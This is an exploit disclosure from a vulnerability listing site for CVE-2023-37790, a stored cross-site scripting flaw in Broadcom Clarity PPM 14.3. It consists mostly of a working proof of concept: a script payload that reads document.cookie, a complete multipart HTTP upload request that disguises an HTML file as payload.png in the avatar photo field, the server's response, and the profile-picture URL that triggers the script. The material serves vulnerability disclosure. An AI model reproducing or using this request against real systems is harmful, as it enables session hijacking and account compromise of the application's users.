Share
## https://sploitus.com/exploit?id=PACKETSTORM:173508
==================================================================================================================================
# Title : Insufficient input validation , in CA PPM 14.3 allows remote attackers to execute stored cross-site scripting attacks. |
# Author : Kaizen |
# Tested on : windows 10 / browser : Chrome Version 114.0.5735.133 (Official Build) (x86_64) |
# Vendor : https://www.broadcom.com/
# Dork : https://www.broadcom.com/products/software/value-stream-management/clarity |
#Affected Product Version: Clarity PPM 14.3.0.298 / Jaspersoft
#CVE Assigned: CVE-2023-37790
==================================================================================================================================
POC:
Header: Content-Type: text/html; charset=utf-8
Payload: <body onload=alert(document.cookie)>
HTTP Request:
POST /niku/nu?uitk.vxml.form=1&action=projmgr.avatarPhotoUpload&2097152&Error%20CMN-01035:%20The%20file%20size%20exceeds%202%20MB%20limit%20or%20file%20type%20is%20not%20supported.%20Please%20try%20again.&uitk.navigation.location=Modal&uitk.navigation.parent.location=Modal&uitk.navigation.last.workspace.action=npt.overview HTTP/1.1
[REDACTED]
------WebKitFormBoundaryr7Mas24AkgGJH4HE
Content-Disposition: form-data; name="avatar_photo"
------WebKitFormBoundaryr7Mas24AkgGJH4HE
Content-Disposition: form-data; name="avatar_photo_ODF_New_Attachment_File_Name"; filename="payload.png"
Content-Type: text/html; charset=utf-8
<body onload=alert(document.cookie)>
------WebKitFormBoundaryr7Mas24AkgGJH4HE
Content-Disposition: form-data; name="superSecretTokenKey"
superSecretTokenValue
------WebKitFormBoundaryr7Mas24AkgGJH4HE--
HTTP Response:
HTTP/1.1 200 OK
content-disposition: inline;filename="payload.png"
Content-Type: text/html;charset=utf-8
Content-Length: 90
Date: Thu, 06 Jul 2023 07:33:24 GMT
Connection: close
Server: CA PPM
<body onload=alert(document.cookie)>
To Trigger Stored XSS visit user profile picture.
https://127.0.0.1/niku/app?action=union.viewODFFile&objectType=resource&odf_pk=5763513&fileId=5178985&versionId=51[REDACTED]hXm0r7tSeUqEr=true